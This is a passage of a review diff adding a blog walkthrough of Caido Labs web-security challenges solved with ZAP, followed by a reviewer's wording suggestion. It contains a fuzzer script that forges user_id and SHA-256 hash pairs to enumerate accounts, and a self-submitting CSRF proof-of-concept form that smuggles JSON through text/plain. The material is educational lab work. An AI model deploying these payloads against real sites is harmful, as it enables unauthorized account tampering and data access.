site/content/blog/2025-10-07-solving-caido-labs/index.md

```diff
@@ -0,0 +1,430 @@
+ * 
+ * @return {string} The next generated payload.
+ */
+function next() {
+  start = "user_id=";
+  ID = count.toString();
+  mid = "&hash="
+  sign = sha256(start + ID)
+	payload = start + ID + mid + sign;
+	count++;
+	return payload;
+}
+
+/**
+ * Resets the internal state of the payload generator, as if no calls to
+ * hasNext() or next() have been previously made.
+ * 
+ * Normally called once the method hasNext() returns false and while payloads
+ * are still needed.
+ */
+function reset() {
+	count = INITIAL_VALUE;
+}
+
+/**
+ * Releases any resources used for generation of payloads (for example, a file).
+ * 
+ * Called once the payload generator is no longer needed.
+ */
+function close() {
+}
+
+function sha256(message) {
+  const digest = MessageDigest.getInstance("SHA-256");
+  const bytes = new java.lang.String(message).getBytes("UTF-8");
+  const hash = digest.digest(bytes);
+
+  let hex = "";
+  for (let i = 0; i < hash.length; i++) {
+    let byte = hash[i] & 0xff;
+    // Manually pad with '0' if needed
+    hex += (byte < 16 ? "0" : "") + byte.toString(16);
+  }
+
+  return hex;
+}
+```
+
+Once we have the script ready and enabled we can start a Fuzzer by selecting the whole post body and selecting our script as the payload.
+
+![shapayload.png](images/shapayload.png)
+
+After running the Fuzzer we can see the requests that included "super" on the response.
+
+![shafuzzed.png](images/shafuzzed.png)
+
+Finally we check the request to be sure we got the value of the super admin.
+
+![shasuper.png](images/shasuper.png)
+
+## CSRF via Content-Type
+
+This challenge can be found on the next URL:
+
+[https://labs.cai.do/csrfContentType.php](https://labs.cai.do/csrfContentType.php)
+
+On this challenge we are shown the next site.
+
+![csrfsite.png](images/csrfsite.png)
+
+If we change our name the next request is sent.
+
+![csrfreq.png](images/csrfreq.png)
+
+The challenge says we can send "text/plain" as Content-Type, so we validate that.
+
+![csrfplain.png](images/csrfplain.png)
+
+Now we can use the community script [json_csrf_poc_generator](https://github.com/zaproxy/community-scripts/blob/main/targeted/json_csrf_poc_generator.js), to use it we right click and select "Invoke with Script..." -> json_csrf_poc_generator.py, this will generate the next page:
+
+```html
+<!DOCTYPE html>
+<head>
+ <title>CSRF POC</title>
+</head>
+<body>
+<form action="https://labs.cai.do/csrfContentType.php" id="formid" method="post" enctype="text/plain">
+<input type ='hidden' name='{"name":"hacked","ignore_me":"' value='something"}'>
+</form>
+<script>document.getElementById('formid').submit();</script>
+</body></html>
+```
+
+We can see that the HTML adds the value `,"ignore_me":"' value='something"}` to the request, this is because the browser expects to send a POST form as a request, not a JSON, if the request does not look like a post form one the browser will try to format it, and that would send an invalid request.
```

Comment:
```suggestion
We can see that the HTML adds the value `,"ignore_me":"' value='something"}` to the request, this is because the browser expects to send a POST form as a request, not a JSON, if the request does not look like a POST form in the browser will try to format it, and that would send an invalid request.
```